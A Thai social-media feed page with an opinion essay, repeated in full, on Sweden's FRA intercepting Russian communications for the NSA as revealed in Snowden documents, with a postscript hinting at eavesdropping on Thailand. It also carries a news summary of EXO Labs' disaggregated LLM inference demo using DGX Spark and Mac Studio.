    ความจริงเรื่องนี้ไม่ใช่เรื่องใหม่ ผู้สื่อข่าวสวีเดน นาย Martin Jonsson ได้พยายามขุดมา ตั้งแต่ปี 2005 เกี่ยวกับหน่วยงานข่าวกรองของสวีเดน ชื่อ Forsvarets Radioanstalt ( FRA ) แปลคร่าวๆ คือ National Defense Radio Establishment ซึ่งมีข่าวว่า ตั้งขึ้นมา เพื่อทำการจารกรรมข้อมูลจากสัญญาน ( wiretap ) ที่ผ่านไปมาอยู่แถบนั้น ให้กับ National Security Agency (NSA) ของอเมริกา โดยใช้ระบบที่รู้จักกันในชื่อ Echelon ที่โด่งดัง และประสิทธิภาพน่าขนลุก (ที่ใช้ลูกกลมเหมือนลูกปิงปองยักษ์) แต่ความเป็นจริง Echelon เป็นเพียงหนึ่งในระบบต่างๆที่ NSA ใช้ ยังมีระบบอื่นที่น่าตกใจกว่า อีกแยะ.

    นาย Jonsson บอกว่า NSA เป็นหน่วยงานข่าวกรองที่ใหญ่ที่สุดของอเมริกา และเป็นศูนย์กลางของเครือข่ายการดักฟัง ที่ใหญ่ที่สุดในโลก และ FRA ก็เป็นส่วนหนึ่ง ของเครือข่ายนี้

    NSA มีขนาด และเครือข่ายใหญ่กว่า CIA มาก โดย NSA เน้นการหาข่าวกรองจากคลื่นสัญญานต่างๆ ที่ส่งกันทั้ง บนดิน ใต้ดิน บนเรือ ใต้น้ำ บนท้องฟ้า ในเครื่องบิน จากดาวเทียม ฯลฯ โดยมีการทำสัญญาการให้ร่วมมือกัน ระหว่าง อเมริกา อังกฤษ แคนาดา นิวซีแลนด์ และออสเตรเลีย เรียกว่า กลุ่ม Five Eyes ตั้งแต่ ปี 1954 เพื่อแลกเปลี่ยน ข้อมูลระหว่างกันอย่างเข้มข้น โดยเฉพาะในช่วงสงครามเย็น

    นาย Jonssen เล่าว่า ตอนนั้น เราเพียงรู้ว่า เครือข่ายดักฟังข้อมูล มีเพียง 5 ประเทศ ดังกล่าว ต่อมาปี 2007 มีข่าวเล็ดลอดออกมาว่า สวีเดน อาจจะเป็น ประเทศที่ 6 ที่จะได้เข้าไปร่วมกับเครือข่ายนี้ด้วย โดยจะทำสัญญาเพิ่ม ขณะเดียวกัน เพื่อเป็นการเตรียมตัวให้พร้อม สวีเดนก็ดำเนินการออกกฏหมาย ที่รู้จักกันในชื่อ FRA law ให้รัฐสามารถดักฟัง เก็บข้อมูลทุกอย่าง ที่ผ่านเข้ามาในอาณาเขตของสวีเดน ไม่ว่า จะเป็นทางโทรศัพท์ หรือทางเอกสาร ฯลฯได้ ซึ่งเดิมถือว่าเป็นการผิดกฏหมาย ในเรื่องการละเมิดสิทธิ โดยทาง NSA ส่งทีมมาช่วยร่างกฏหมาย เตี๊ยมคำถามคำตอบ ที่ทางรัฐจะต้องตอบกับสภาประชาชนและสื่อ เล่นกันแบบนั้นเลย นึกว่าจะมีแต่แถวบ้านสมันน้อย

    ชาวสวีเดน ต่างออกมาประท้วงร่างกฏหมายฉบับนี้ อย่างมากมาย แต่ในที่สุด ฝ่ายรัฐก็ชนะไปอย่างเฉียดฉิว วันที่ 13 เดือนเมษายน 2007 Odenberg รัฐมนตรีกลาโหมของสวีเดน กับ Chertoff หัวหน้า Homeland Security ของอเมริกา ก็ลงนามในสัญญาที่มีผลให้ สวีเดน รับหน้าที่ ทำการดักฟังการสื่อสารระหว่างประเทศทั้งหมดของรัสเซีย และแชร์ข้อมูลที่ได้รับกับอเมริกา หลังจากนั้นไม่นาน ข่าวเกี่ยวกับสัญญาล้วงตับนี้ก็หลุดออกมาถึงสื่อ รัฐบาลสวีเดนพยายามแก้ตัวว่า มันเป็นเรื่องจำเป็น เกี่ยวกับความมั่นคงของประเทศ เป็นเรื่องธรรมดา หลายประเทศก็ทำสัญญาเช่นนี้กับอเมริกา
    ส่วน FRA law ฝีแตกที่หลัง ชาวสวีเดนเพิ่งรู้เรื่อง ต่างไม่พอใจการกระทำของรัฐบาล สื่อ และพรรคฝ่ายค้าน พากันสอบถามรัฐบาล รัฐบาลแก้ตัวไม่หลุด แถไปเรื่อยๆ ข้อแก้ตัวอันหนึ่ง ที่ทำให้ชาวบ้านยิ่งงงหนัก คือคำตอบที่บอกว่า การล้วงตับรัสเซีย เป็นเรื่องจำเป็น สำหรับการป้องกันพวกทหารของเรา ที่ส่งไปรบที่อาฟกานิสถาน อืม เป็นการอ้างเหตุผลได้บัดซบ ไม่น้อยกว่านักการเมืองแถวบ้านสมันน้อย สวีเดนส่งกองทหารไปช่วยอเมริกาถล่มอาฟกานิสถาน และลิเบียในช่วงปี 2011 รวมทั้งส่งเครื่องบินรบ Saab Gripen ที่โด่งดัง ไปช่วยด้วย

    เป็นการดูแลความมั่นคงของสวีเดน ที่ใช้วิสัยทัศน์ ที่ยาว และระยะทางอ้อมไกลมาก

    สื่อสวีเดนไม่ยอมหยุด ช่วยกันขุดต่อ และนำมาเปิดเผยว่า ประมาณ 80% ของการใช้อินเตอร์เนทระหว่างประเทศของรัสเซีย ต้องผ่านเส้นทางสวีเดน นับว่าอเมริกามีตาแหลมคม เลือกคนล้วงตับได้เก่งจริงๆ นอกจากนี้ TeliaSonera บริษัทร่วมทุนยักษ์ใหญ่ ของสวีเดนและฟินแลนด์ ซึ่งมีเครือข่ายใยแก้ว ( fiberoptic ) ใหญ่ที่สุดของโลกบริษัทหนึ่ง และได้รับสัมปทานประกอบกิจการโทรศัพท์เคลื่อนที่ ในรัสเซียรายหนึ่งนั้น ถ้าดูตามแผนที่ของบริษัท จะเห็นว่า ได้มีการวางแผน การวางเส้นทางสายใยแก้วของบริษัท ที่มีผลให้การสื่อสารของรัสเซีย ต้องทำผ่านสวีเดน การส่งเมล์ และโทรศัพท์ ไปต่างประเทศของรัสเซีย ต้องผ่านสต๊อกโฮมก่อน ไม่ว่าผู้รับจะอยูที่ใด เยี่ยมจริงๆ

    ความร่วม มือระหว่าง FRA กับ NSA ขยายตัวขึ้นอย่างมโหฬาร ตั้งแต่ 2011 NSA สามารถดักฟัง การสื่อสารในประเทศแถบบอลติกได้หมด ผ่านเคเบิลของสวีเดน

    Duncan Campbell สื่อชาวอังกฤษ ประเภทเกาะติด ตามขุดลึกอย่างไม่เลิก ตามสืบเรื่อง การล้วงตับดักฟังข้อมูลต่อ ได้ข้อมูลลึกมาเพียบ เขาบอกว่า องค์กรที่มาร่วมเป็นตาที่ 6 กับกลุ่ม Five Eyes และถือว่าเป็นหุ้นส่วนใหญ่ ที่ ไม่ได้เป็นประเทศ ที่ใช้ภาษาอังกฤษเป็นภาษาแม่ แต่ให้ความร่วมมือเป็นอย่างดียิ่ง กับหน่วยงานของรัฐบาลอังกฤษ UK’s Government Communications Head Quarters (GCHQ) คือสวีเดน!

    ตกลง สวีเดนเป็นนักล้วงตัวจริง ไม่ล้วงธรรมดา ล้วงแล้ว แล้วแหกปากบอกต่อไปทั่วอีกด้วย สวีเดนทำอย่างนี้ทำไม

    โฆษก ของ FRA ยอมรับว่า NSA ของอเมริกา มี full access ผ่านได้ทุกด่าน เข้าได้ตลอดเวลาถึงศูนย์ข้อมูล ที่ฝ่ายข่าวกรองของสวีเดนได้มา เขาให้เหตุผลว่า ” เราคงไม่ทำอะไร โดยไม่ได้อะไรกลับมาหรอกนะ เมื่อเราสามารถหาข้อมูลในส่วนนี้ของโลกได้ เราก็เอาข้อมูลเหล่านี้ ไปแลกกับข้อมูลของส่วนอื่นของโลก ซึ่งยากสำหรับเราที่จะได้มา แต่มันเป็นข้อมูล ที่อาจมีความสำคัญอย่างยิ่งยวด สำหรับนโยบายต่างประเทศของเรา”

    อย่างหนึ่งที่ สวีเดนได้รับมาจาก NSA ในการเป็นมิตรร่วมล้วง คือได้ โปรแกรมสุดยอดสำหรับการตามประกบเป้าหมาย ที่ต้องการจะล้วงลึกถึงสุดทางชื่อ Xkeyscore คือการตาม online ของทุกคนได้อย่างหมดจด อ้อ ไอ้เจ้านี่เอง ที่มันตาม ป่วนลุงนิทาน! โปรแกรมนี้ สามารถทำให้สวีเดน แฮ๊กเข้าไปในคอมพิวเตอร์ และสอดส่องดูกิจกรรมของประชาชน ของตนได้แบบไม่เหลือ อืม มันเลวได้เหมือนกันหมด นอกจากนี้ สวีเดนยังได้เข้าร่วม Project Quantum ที่ว่าเป็นการปฏิบัติการ hijacks ด้านคอมพิวเตอร์ที่สุดยอด
    Edward Snowden พูดถึงฤทธิ์เดช ของ Xkeyscore ไว้ว่า “ผมแค่นั่งอยู่ที่โต๊ะทำงานของ ผม ผมก็สามารถ wiretap ใครก็ได้ จากคุณ หรือบัญชีของคุณ ไปจนถึง ผู้พิพากษาศาลสูง แม้กระทั่งประธานาธิบดี เพียงมีอีเมล์ ของคนนั้นเท่านั้น

    ส่วน Quantum เขาว่า เป็นการใช้คลื่นวิทยุ กับอุปกรณ์ ที่ NSA สร้างขึ้นพิเศษ มีชื่อเรียกกันวงในว่า Cottonmouth I ก็ดูดข้อมูลจากคอมพิวเตอร์ได้หมด แถมส่งต่อไปตามสถานีใหญ่ของ NSA หรือส่งไปสถานีย่อยแบบพกพา portable ได้อีก

    เรื่องการจารกรรมข้อมูลของรัสเซีย โดยสวีเดน เพื่ออเมริกาและพวก เป็นเรื่องที่น่ารังเกียจ และค้านกับการที่สวีเดนประกาศตัวเสมอว่า ฉันเป็นชาติเป็นกลาง มันเป็นกลางแบบที่เราคงนึกกันไม่ถึง โลกนี้ยังมีอะไรอีกแยะที่เรายังไม่รู้ ตราบเท่าที่ยังไม่เอากระป๋องสี่เหลี่ยมที่เขาครอบหัวเราออก

    แล้วรัสเซียรู้เรื่องการล้วงตับ นี้ไหม รัสเซียคงยิ่งกว่ารู้ การเอาเครื่องบินรบ บินเฉี่ยวหัว และเอาเรือดำน้ำ โผล่ขึ้นไปตบหน้า แล้วหายตัวไป เบ็ดเสร็จประมาณ 40 ครั้ง ในรอบ 8 เดือน อย่างที่ครูอี ด่าหน้าเสาธงนั่นแหละ คงเป็นคำตอบของรัสเซียอย่างหนึ่ง ก็ไหนว่ามีมือยาวล้วงได้ล้ำลึกนัก ก็ผลัดกันล้วงบ้างแล้วกัน และเราก็ดูกันต่อไปว่า ที่สุดแล้ว ใครจะล้วงลึก หรือ ลวงลึก ได้กว่ากัน

    สวัสดีครับ
    คนเล่านิทาน
    22 ธค. 2557

    ————————–———————–

    บทส่งท้าย

    เขียนเรื่องเขา ผลัดกันล้วงแล้ว อดนึกถึงเรื่องของเรา สมันน้อยไม่ได้ สมันน้อยเคยถูกล้วงบ้างไหม โดยใคร แล้วยังล้วงกันอยู่หรือเปล่า เคยคิดกันบ้างไหมครับ

    ลองคิดเป็นตัวอย่างเล่นๆ ประมาณ ปี พ.ศ. 2533 แดนสมันน้อยประกาศเชิญชวนติดตั้ง โทรศัพท์ 3 ล้านเลขหมาย แบ่งเป็น กทม. 2 ล้านเลขหมาย ต่างจังหวัด 1 ล้านเลขหมาย ใครประมูลได้ ส่วนไหนบ้าง ใครเป็นคนได้งานวางไฟเบอร์ออพติก ใครรับช่วงต่อ ใครเป็นหัวเรือใหญ่ดูแลต่อรองเงื่อนไข ไปลองหาอ่านกันบ้างก็ดีนะครับ จะได้รู้หนา รู้บาง รู้ข้าง รู้ฝ่าย กันบ้าง

    แล้วลองนึกถึงอีกเรื่อง เมื่อประมาณปี พ.ศ. 2535 แดนสมันน้อยให้สัมปทานดาวเทียม ใครเป็นคนได้สัมปทาน ทำอยู่กี่ปีแล้วดันขายไปให้ใคร ผิดเงื่อนไขสัมปทาน ผิดกฏหมายไหม มีใครคิดดำเนินการอะไรกันบ้างหรือเปล่า

    ตอนนี้ ดาวเทียมของบริษัทที่ขายไป ก็ยังใช้ตำแหน่งวงโคจรประจำ ของสมันน้อยอยู่เหมือนเดิม แต่เจ้าของใหม่กลายเป็นลูกกระเป๋ง ของไอ้นักล่า

    ลองต่อจิ๊กซอว์ เรื่องดาวเทียม โทรศัพท์ และสายไฟเบอร์ออพติก ดูเล่นกันหน่อย เห็นภาพอะไรไหมครับ นี่ยังไม่ได้เอาเรื่องโทรศัพท์เคลื่อนที่มารวมต่อเลยนะ

    ถ้าเห็นภาพแล้ว จะทำอะไรก็ให้มันมิดชิด ระวังกันหน่อยนะครับ เดี๋ยวไอ้คนแอบอ่านแอบดูแอบฟังมันกุ้งยิงกินหมด ฮาออกไหมครับ ผมฮาไม่ออกหรอก ยิ่งเคยเห็นไอ้ลูกปิงปองยักษ์แว็บๆ ยิ่งคิดมาก ใครอยากเห็น นู่นครับ แถวเชียงใหม่ ออกนอกเมืองไปไม่ถึงชั่วโมงมีลูกเบ้อเริ่ม
    ผลัดกันล้วง ตอนที่ 4 นิทานเรื่องจริง เรื่อง “ผลัดกันล้วง” ตอนที่ 4 (ตอนจบ) “สวีเดน ทำการจารกรรมข้อมูลเกี่ยวกับ รัสเซีย ให้อเมริกามานานแล้ว ” โทรทัศน์ สวีเดน Sveriges Television ( SVT ) ออกข่าวนี้ ตั้งแต่ปลายปี 2013 บอกว่า เรื่องนี้อยู่ในเอกสาร ที่นาย Edward Snowden เอามาปูด จนต้องหนีหัวซุกหัวซุนไปน่ะและตอนนี้ นาย Snowden ก็คงกำลังนั่งซุกหัว ซุกตัว อยู่ในที่หลบภัยอุ่นๆ ตรงไหนสักแห่งหนึ่งของรัสเซีย และเล่าเรื่องที่มีรายละเอียดน่าสนใจเพิ่มเติม ให้เจ้าของที่หลบภัยฟังต่อ ความจริงเรื่องนี้ไม่ใช่เรื่องใหม่ ผู้สื่อข่าวสวีเดน นาย Martin Jonsson ได้พยายามขุดมา ตั้งแต่ปี 2005 เกี่ยวกับหน่วยงานข่าวกรองของสวีเดน ชื่อ Forsvarets Radioanstalt ( FRA ) แปลคร่าวๆ คือ National Defense Radio Establishment ซึ่งมีข่าวว่า ตั้งขึ้นมา เพื่อทำการจารกรรมข้อมูลจากสัญญาน ( wiretap ) ที่ผ่านไปมาอยู่แถบนั้น ให้กับ National Security Agency (NSA) ของอเมริกา โดยใช้ระบบที่รู้จักกันในชื่อ Echelon ที่โด่งดัง และประสิทธิภาพน่าขนลุก (ที่ใช้ลูกกลมเหมือนลูกปิงปองยักษ์) แต่ความเป็นจริง Echelon เป็นเพียงหนึ่งในระบบต่างๆที่ NSA ใช้ ยังมีระบบอื่นที่น่าตกใจกว่า อีกแยะ. นาย Jonsson บอกว่า NSA เป็นหน่วยงานข่าวกรองที่ใหญ่ที่สุดของอเมริกา และเป็นศูนย์กลางของเครือข่ายการดักฟัง ที่ใหญ่ที่สุดในโลก และ FRA ก็เป็นส่วนหนึ่ง ของเครือข่ายนี้ NSA มีขนาด และเครือข่ายใหญ่กว่า CIA มาก โดย NSA เน้นการหาข่าวกรองจากคลื่นสัญญานต่างๆ ที่ส่งกันทั้ง บนดิน ใต้ดิน บนเรือ ใต้น้ำ บนท้องฟ้า ในเครื่องบิน จากดาวเทียม ฯลฯ โดยมีการทำสัญญาการให้ร่วมมือกัน ระหว่าง อเมริกา อังกฤษ แคนาดา นิวซีแลนด์ และออสเตรเลีย เรียกว่า กลุ่ม Five Eyes ตั้งแต่ ปี 1954 เพื่อแลกเปลี่ยน ข้อมูลระหว่างกันอย่างเข้มข้น โดยเฉพาะในช่วงสงครามเย็น นาย Jonssen เล่าว่า ตอนนั้น เราเพียงรู้ว่า เครือข่ายดักฟังข้อมูล มีเพียง 5 ประเทศ ดังกล่าว ต่อมาปี 2007 มีข่าวเล็ดลอดออกมาว่า สวีเดน อาจจะเป็น ประเทศที่ 6 ที่จะได้เข้าไปร่วมกับเครือข่ายนี้ด้วย โดยจะทำสัญญาเพิ่ม ขณะเดียวกัน เพื่อเป็นการเตรียมตัวให้พร้อม สวีเดนก็ดำเนินการออกกฏหมาย ที่รู้จักกันในชื่อ FRA law ให้รัฐสามารถดักฟัง เก็บข้อมูลทุกอย่าง ที่ผ่านเข้ามาในอาณาเขตของสวีเดน ไม่ว่า จะเป็นทางโทรศัพท์ หรือทางเอกสาร ฯลฯได้ ซึ่งเดิมถือว่าเป็นการผิดกฏหมาย ในเรื่องการละเมิดสิทธิ โดยทาง NSA ส่งทีมมาช่วยร่างกฏหมาย เตี๊ยมคำถามคำตอบ ที่ทางรัฐจะต้องตอบกับสภาประชาชนและสื่อ เล่นกันแบบนั้นเลย นึกว่าจะมีแต่แถวบ้านสมันน้อย ชาวสวีเดน ต่างออกมาประท้วงร่างกฏหมายฉบับนี้ อย่างมากมาย แต่ในที่สุด ฝ่ายรัฐก็ชนะไปอย่างเฉียดฉิว วันที่ 13 เดือนเมษายน 2007 Odenberg รัฐมนตรีกลาโหมของสวีเดน กับ Chertoff หัวหน้า Homeland Security ของอเมริกา ก็ลงนามในสัญญาที่มีผลให้ สวีเดน รับหน้าที่ ทำการดักฟังการสื่อสารระหว่างประเทศทั้งหมดของรัสเซีย และแชร์ข้อมูลที่ได้รับกับอเมริกา หลังจากนั้นไม่นาน ข่าวเกี่ยวกับสัญญาล้วงตับนี้ก็หลุดออกมาถึงสื่อ รัฐบาลสวีเดนพยายามแก้ตัวว่า มันเป็นเรื่องจำเป็น เกี่ยวกับความมั่นคงของประเทศ เป็นเรื่องธรรมดา หลายประเทศก็ทำสัญญาเช่นนี้กับอเมริกา ส่วน FRA law ฝีแตกที่หลัง ชาวสวีเดนเพิ่งรู้เรื่อง ต่างไม่พอใจการกระทำของรัฐบาล สื่อ และพรรคฝ่ายค้าน พากันสอบถามรัฐบาล รัฐบาลแก้ตัวไม่หลุด แถไปเรื่อยๆ ข้อแก้ตัวอันหนึ่ง ที่ทำให้ชาวบ้านยิ่งงงหนัก คือคำตอบที่บอกว่า การล้วงตับรัสเซีย เป็นเรื่องจำเป็น สำหรับการป้องกันพวกทหารของเรา ที่ส่งไปรบที่อาฟกานิสถาน อืม เป็นการอ้างเหตุผลได้บัดซบ ไม่น้อยกว่านักการเมืองแถวบ้านสมันน้อย สวีเดนส่งกองทหารไปช่วยอเมริกาถล่มอาฟกานิสถาน และลิเบียในช่วงปี 2011 รวมทั้งส่งเครื่องบินรบ Saab Gripen ที่โด่งดัง ไปช่วยด้วย เป็นการดูแลความมั่นคงของสวีเดน ที่ใช้วิสัยทัศน์ ที่ยาว และระยะทางอ้อมไกลมาก สื่อสวีเดนไม่ยอมหยุด ช่วยกันขุดต่อ และนำมาเปิดเผยว่า ประมาณ 80% ของการใช้อินเตอร์เนทระหว่างประเทศของรัสเซีย ต้องผ่านเส้นทางสวีเดน นับว่าอเมริกามีตาแหลมคม เลือกคนล้วงตับได้เก่งจริงๆ นอกจากนี้ TeliaSonera บริษัทร่วมทุนยักษ์ใหญ่ ของสวีเดนและฟินแลนด์ ซึ่งมีเครือข่ายใยแก้ว ( fiberoptic ) ใหญ่ที่สุดของโลกบริษัทหนึ่ง และได้รับสัมปทานประกอบกิจการโทรศัพท์เคลื่อนที่ ในรัสเซียรายหนึ่งนั้น ถ้าดูตามแผนที่ของบริษัท จะเห็นว่า ได้มีการวางแผน การวางเส้นทางสายใยแก้วของบริษัท ที่มีผลให้การสื่อสารของรัสเซีย ต้องทำผ่านสวีเดน การส่งเมล์ และโทรศัพท์ ไปต่างประเทศของรัสเซีย ต้องผ่านสต๊อกโฮมก่อน ไม่ว่าผู้รับจะอยูที่ใด เยี่ยมจริงๆ ความร่วม มือระหว่าง FRA กับ NSA ขยายตัวขึ้นอย่างมโหฬาร ตั้งแต่ 2011 NSA สามารถดักฟัง การสื่อสารในประเทศแถบบอลติกได้หมด ผ่านเคเบิลของสวีเดน Duncan Campbell สื่อชาวอังกฤษ ประเภทเกาะติด ตามขุดลึกอย่างไม่เลิก ตามสืบเรื่อง การล้วงตับดักฟังข้อมูลต่อ ได้ข้อมูลลึกมาเพียบ เขาบอกว่า องค์กรที่มาร่วมเป็นตาที่ 6 กับกลุ่ม Five Eyes และถือว่าเป็นหุ้นส่วนใหญ่ ที่ ไม่ได้เป็นประเทศ ที่ใช้ภาษาอังกฤษเป็นภาษาแม่ แต่ให้ความร่วมมือเป็นอย่างดียิ่ง กับหน่วยงานของรัฐบาลอังกฤษ UK’s Government Communications Head Quarters (GCHQ) คือสวีเดน! ตกลง สวีเดนเป็นนักล้วงตัวจริง ไม่ล้วงธรรมดา ล้วงแล้ว แล้วแหกปากบอกต่อไปทั่วอีกด้วย สวีเดนทำอย่างนี้ทำไม โฆษก ของ FRA ยอมรับว่า NSA ของอเมริกา มี full access ผ่านได้ทุกด่าน เข้าได้ตลอดเวลาถึงศูนย์ข้อมูล ที่ฝ่ายข่าวกรองของสวีเดนได้มา เขาให้เหตุผลว่า ” เราคงไม่ทำอะไร โดยไม่ได้อะไรกลับมาหรอกนะ เมื่อเราสามารถหาข้อมูลในส่วนนี้ของโลกได้ เราก็เอาข้อมูลเหล่านี้ ไปแลกกับข้อมูลของส่วนอื่นของโลก ซึ่งยากสำหรับเราที่จะได้มา แต่มันเป็นข้อมูล ที่อาจมีความสำคัญอย่างยิ่งยวด สำหรับนโยบายต่างประเทศของเรา” อย่างหนึ่งที่ สวีเดนได้รับมาจาก NSA ในการเป็นมิตรร่วมล้วง คือได้ โปรแกรมสุดยอดสำหรับการตามประกบเป้าหมาย ที่ต้องการจะล้วงลึกถึงสุดทางชื่อ Xkeyscore คือการตาม online ของทุกคนได้อย่างหมดจด อ้อ ไอ้เจ้านี่เอง ที่มันตาม ป่วนลุงนิทาน! โปรแกรมนี้ สามารถทำให้สวีเดน แฮ๊กเข้าไปในคอมพิวเตอร์ และสอดส่องดูกิจกรรมของประชาชน ของตนได้แบบไม่เหลือ อืม มันเลวได้เหมือนกันหมด นอกจากนี้ สวีเดนยังได้เข้าร่วม Project Quantum ที่ว่าเป็นการปฏิบัติการ hijacks ด้านคอมพิวเตอร์ที่สุดยอด Edward Snowden พูดถึงฤทธิ์เดช ของ Xkeyscore ไว้ว่า “ผมแค่นั่งอยู่ที่โต๊ะทำงานของ ผม ผมก็สามารถ wiretap ใครก็ได้ จากคุณ หรือบัญชีของคุณ ไปจนถึง ผู้พิพากษาศาลสูง แม้กระทั่งประธานาธิบดี เพียงมีอีเมล์ ของคนนั้นเท่านั้น ส่วน Quantum เขาว่า เป็นการใช้คลื่นวิทยุ กับอุปกรณ์ ที่ NSA สร้างขึ้นพิเศษ มีชื่อเรียกกันวงในว่า Cottonmouth I ก็ดูดข้อมูลจากคอมพิวเตอร์ได้หมด แถมส่งต่อไปตามสถานีใหญ่ของ NSA หรือส่งไปสถานีย่อยแบบพกพา portable ได้อีก เรื่องการจารกรรมข้อมูลของรัสเซีย โดยสวีเดน เพื่ออเมริกาและพวก เป็นเรื่องที่น่ารังเกียจ และค้านกับการที่สวีเดนประกาศตัวเสมอว่า ฉันเป็นชาติเป็นกลาง มันเป็นกลางแบบที่เราคงนึกกันไม่ถึง โลกนี้ยังมีอะไรอีกแยะที่เรายังไม่รู้ ตราบเท่าที่ยังไม่เอากระป๋องสี่เหลี่ยมที่เขาครอบหัวเราออก แล้วรัสเซียรู้เรื่องการล้วงตับ นี้ไหม รัสเซียคงยิ่งกว่ารู้ การเอาเครื่องบินรบ บินเฉี่ยวหัว และเอาเรือดำน้ำ โผล่ขึ้นไปตบหน้า แล้วหายตัวไป เบ็ดเสร็จประมาณ 40 ครั้ง ในรอบ 8 เดือน อย่างที่ครูอี ด่าหน้าเสาธงนั่นแหละ คงเป็นคำตอบของรัสเซียอย่างหนึ่ง ก็ไหนว่ามีมือยาวล้วงได้ล้ำลึกนัก ก็ผลัดกันล้วงบ้างแล้วกัน และเราก็ดูกันต่อไปว่า ที่สุดแล้ว ใครจะล้วงลึก หรือ ลวงลึก ได้กว่ากัน สวัสดีครับ คนเล่านิทาน 22 ธค. 2557 ————————–———————– บทส่งท้าย เขียนเรื่องเขา ผลัดกันล้วงแล้ว อดนึกถึงเรื่องของเรา สมันน้อยไม่ได้ สมันน้อยเคยถูกล้วงบ้างไหม โดยใคร แล้วยังล้วงกันอยู่หรือเปล่า เคยคิดกันบ้างไหมครับ ลองคิดเป็นตัวอย่างเล่นๆ ประมาณ ปี พ.ศ. 2533 แดนสมันน้อยประกาศเชิญชวนติดตั้ง โทรศัพท์ 3 ล้านเลขหมาย แบ่งเป็น กทม. 2 ล้านเลขหมาย ต่างจังหวัด 1 ล้านเลขหมาย ใครประมูลได้ ส่วนไหนบ้าง ใครเป็นคนได้งานวางไฟเบอร์ออพติก ใครรับช่วงต่อ ใครเป็นหัวเรือใหญ่ดูแลต่อรองเงื่อนไข ไปลองหาอ่านกันบ้างก็ดีนะครับ จะได้รู้หนา รู้บาง รู้ข้าง รู้ฝ่าย กันบ้าง แล้วลองนึกถึงอีกเรื่อง เมื่อประมาณปี พ.ศ. 2535 แดนสมันน้อยให้สัมปทานดาวเทียม ใครเป็นคนได้สัมปทาน ทำอยู่กี่ปีแล้วดันขายไปให้ใคร ผิดเงื่อนไขสัมปทาน ผิดกฏหมายไหม มีใครคิดดำเนินการอะไรกันบ้างหรือเปล่า ตอนนี้ ดาวเทียมของบริษัทที่ขายไป ก็ยังใช้ตำแหน่งวงโคจรประจำ ของสมันน้อยอยู่เหมือนเดิม แต่เจ้าของใหม่กลายเป็นลูกกระเป๋ง ของไอ้นักล่า ลองต่อจิ๊กซอว์ เรื่องดาวเทียม โทรศัพท์ และสายไฟเบอร์ออพติก ดูเล่นกันหน่อย เห็นภาพอะไรไหมครับ นี่ยังไม่ได้เอาเรื่องโทรศัพท์เคลื่อนที่มารวมต่อเลยนะ ถ้าเห็นภาพแล้ว จะทำอะไรก็ให้มันมิดชิด ระวังกันหน่อยนะครับ เดี๋ยวไอ้คนแอบอ่านแอบดูแอบฟังมันกุ้งยิงกินหมด ฮาออกไหมครับ ผมฮาไม่ออกหรอก ยิ่งเคยเห็นไอ้ลูกปิงปองยักษ์แว็บๆ ยิ่งคิดมาก ใครอยากเห็น นู่นครับ แถวเชียงใหม่ ออกนอกเมืองไปไม่ถึงชั่วโมงมีลูกเบ้อเริ่ม
    0 ความคิดเห็น 0 การแบ่งปัน 202 มุมมอง 0 รีวิว
  • “EXO Labs ผสาน DGX Spark กับ Mac Studio สร้างระบบ LLM ความเร็วทะลุ 2.8 เท่า” — ยุคใหม่ของ AI inference แบบแยกส่วนที่ใช้ฮาร์ดแวร์ทั่วไป

    EXO Labs ได้สาธิตระบบ AI inference แบบใหม่ที่ใช้แนวคิด “disaggregated inference” โดยผสานฮาร์ดแวร์ต่างชนิดเข้าด้วยกัน ได้แก่ 2 เครื่อง NVIDIA DGX Spark กับ Mac Studio ที่ใช้ชิป M3 Ultra ผ่านเครือข่าย 10-Gigabit Ethernet เพื่อแบ่งงานประมวลผลตามจุดแข็งของแต่ละเครื่อง

    ระบบนี้ใช้ซอฟต์แวร์ EXO ซึ่งเป็น open-source framework ที่ออกแบบมาเพื่อกระจายงาน inference ของ LLM ไปยังอุปกรณ์หลายชนิด เช่น desktop, server, laptop หรือแม้แต่สมาร์ตโฟน โดยไม่จำเป็นต้องใช้ GPU เดียวกัน

    หลักการทำงานคือแบ่งขั้นตอน inference ออกเป็น 2 ส่วน:

    Prefill stage: อ่านและประมวลผล prompt ซึ่งต้องใช้พลังประมวลผลสูง — ให้ DGX Spark ทำ
    Decode stage: สร้าง token ทีละตัว ซึ่งต้องใช้ bandwidth สูง — ให้ Mac Studio ทำ

    EXO stream ข้อมูลภายในของโมเดล (KV cache) แบบ layer-by-layer เพื่อให้ทั้งสองระบบทำงานพร้อมกันโดยไม่ต้องรอกัน ส่งผลให้ความเร็วรวมเพิ่มขึ้นถึง 2.8 เท่าเมื่อเทียบกับ Mac Studio เพียงเครื่องเดียว

    การทดสอบใช้โมเดล Llama 3.1 ขนาด 8B กับ prompt ยาว 8,000 token และพบว่าแม้จะเป็นโมเดลขนาดกลาง แต่การแบ่งงานแบบนี้ช่วยเพิ่มประสิทธิภาพได้อย่างชัดเจน

    ข้อมูลในข่าว
    EXO Labs สาธิตระบบ AI inference แบบ disaggregated โดยใช้ DGX Spark กับ Mac Studio
    ใช้เครือข่าย 10-Gigabit Ethernet เชื่อมต่อระหว่างเครื่อง
    ซอฟต์แวร์ EXO เป็น open-source framework สำหรับกระจายงาน inference
    ระบบแบ่งงานเป็น prefill (DGX Spark) และ decode (Mac Studio)
    ใช้การ stream KV cache แบบ layer-by-layer เพื่อให้ทำงานพร้อมกัน
    ความเร็วรวมเพิ่มขึ้น 2.8 เท่าเมื่อเทียบกับ Mac Studio เดี่ยว
    ทดสอบกับโมเดล Llama 3.1 ขนาด 8B และ prompt ยาว 8K token
    EXO 1.0 ยังอยู่ในช่วง early access และไม่ใช่ซอฟต์แวร์ plug-and-play
    NVIDIA เตรียมใช้แนวคิดนี้ในแพลตฟอร์ม Rubin CPX
    Dynamo framework ของ NVIDIA มีเป้าหมายคล้ายกันแต่ไม่มีระบบ subscription อัตโนมัติ

    https://www.tomshardware.com/software/two-nvidia-dgx-spark-systems-combined-with-m3-ultra-mac-studio-to-create-blistering-llm-system-exo-labs-demonstrates-disaggregated-ai-inference-and-achieves-a-2-8-benchmark-boost
